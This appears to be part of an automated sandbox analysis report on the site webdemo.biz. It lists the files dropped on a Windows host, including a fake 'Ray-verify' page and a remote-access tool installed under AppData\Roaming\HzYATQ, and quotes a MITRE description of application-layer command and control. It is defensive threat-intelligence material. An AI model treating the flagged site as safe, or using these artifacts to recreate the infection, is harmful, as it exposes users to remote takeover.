Warnings

LLM Input / Output

Created / dropped Files

C:\ProgramData\Microsoft\Network\Downloader\edb.log

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\33CUD2J1\loca[1].htm

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\AN5UOLP8\Ray-verify[1].htm

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jmbeadtq.mgw.ps1

C:\Users\user\AppData\Roaming\HzYATQ\HTCTL32.DLL

C:\Users\user\AppData\Roaming\HzYATQ\NSM.LIC

C:\Users\user\AppData\Roaming\HzYATQ\NSM.ini

C:\Users\user\AppData\Roaming\HzYATQ\PCICHEK.DLL

C:\Users\user\AppData\Roaming\HzYATQ\PCICL32.DLL

C:\Users\user\AppData\Roaming\HzYATQ\TCCTL32.DLL

C:\Users\user\AppData\Roaming\HzYATQ\client32.exe

C:\Users\user\AppData\Roaming\HzYATQ\client32.ini

C:\Users\user\AppData\Roaming\HzYATQ\msvcr100.dll

C:\Users\user\AppData\Roaming\HzYATQ\nskbfltr.inf

C:\Users\user\AppData\Roaming\HzYATQ\pcicapi.dll

C:\Users\user\AppData\Roaming\HzYATQ\remcmdstub.exe

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk

Windows Analysis Report
https://webdemo.biz/

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre